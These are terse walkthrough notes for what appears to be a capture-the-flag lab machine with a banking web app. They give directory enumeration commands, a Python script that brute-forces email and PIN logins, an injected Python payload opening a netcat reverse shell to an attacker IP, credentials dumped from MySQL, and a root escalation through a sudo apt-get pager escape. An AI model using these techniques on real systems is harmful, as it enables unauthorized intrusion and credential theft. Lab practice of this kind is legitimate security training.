#1
gobuster dir -k -u http://10.0.2.121:5000/ -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
/otp
/qr
/email_list  
#2
cat /usr/share/wordlists/rockyou.txt | grep "^[0-9]" > pins.txt
#3 
import requests
import sys
url = 'http://10.0.2.121:5006/login'
with open('/home/alienum/Desktop/users.txt') as users:
  for u in users:
    with open('/home/alienum/Desktop/pins.txt') as pins:
       for p in pins:
          user = {"email":u.strip(),"pin":p.strip()}
          r =  requests.post(url,data = user)
          if len(r.cookies) != 0:
             print('~~~~~~~~~~~~~~~~~~~')
             print('Credentials found!!')
             print('~~~~~~~~~~~~~~~~~~~')
             print('[+] Username : '+ u.strip())
             print('[+] Password : '+ p.strip())
             sys.exit()

[+] Username : zeus@neobank.vln
[+] Password : 246810
#5
google authenticator, scan the qrcode and insert the otp code
#6
__import__('os').system('nc -e /bin/sh 10.0.2.15 4444')
#7
cat /var/www/html/main.py
banker:neobank1
mysql -u banker -pneobank1
use bank;
select * from system;
banker:adv1se.me
#8
sudo apt-get changelog apt
!/bin/sh
